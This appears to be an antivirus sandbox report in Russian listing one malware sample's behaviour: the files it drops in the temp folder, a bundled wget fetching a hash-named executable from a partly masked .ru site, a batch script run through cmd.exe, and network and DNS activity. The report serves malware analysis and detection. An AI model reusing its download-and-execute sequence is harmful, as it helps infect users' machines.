Техническая информация
- '%TEMP%\7ZipSfx.000\52998cd3c5b534158051885962eef688.exe' (загружен из сети Интернет)
- '%TEMP%\7ZipSfx.000\wget.exe' http://ch###today.ru/wp-admin/"52998cd3c5b534158051885962eef688.exe"
- '%TEMP%\7ZipSfx.000\52998cd3c5b534158051885962eef688.exe'
- '%ProgramFiles%\Internet Explorer\IEXPLORE.EXE' -nohome
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7ZipSfx.000\storeget.cmd" "
- '<SYSTEM32>\chcp.com' 1251
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\adobe[1]
- %TEMP%\7ZipSfx.000\52998cd3c5b534158051885962eef688.exe
- %TEMP%\7ZipSfx.000\storeget.cmd
- %TEMP%\7ZipSfx.000\wget.exe
- %TEMP%\7ZipSfx.000\wget.exe
- %TEMP%\7ZipSfx.000\storeget.cmd
- %TEMP%\7ZipSfx.000\52998cd3c5b534158051885962eef688.exe
- 'ch###today.ru':80
- 'adobe.com':80
- 'localhost':1039
- http://ch###today.ru/wp-admin/52998cd3c5b534158051885962eef688.exe
- http://adobe.com/
- DNS ASK ch###today.ru
- DNS ASK adobe.com
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'IEFrame' WindowName: ''
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''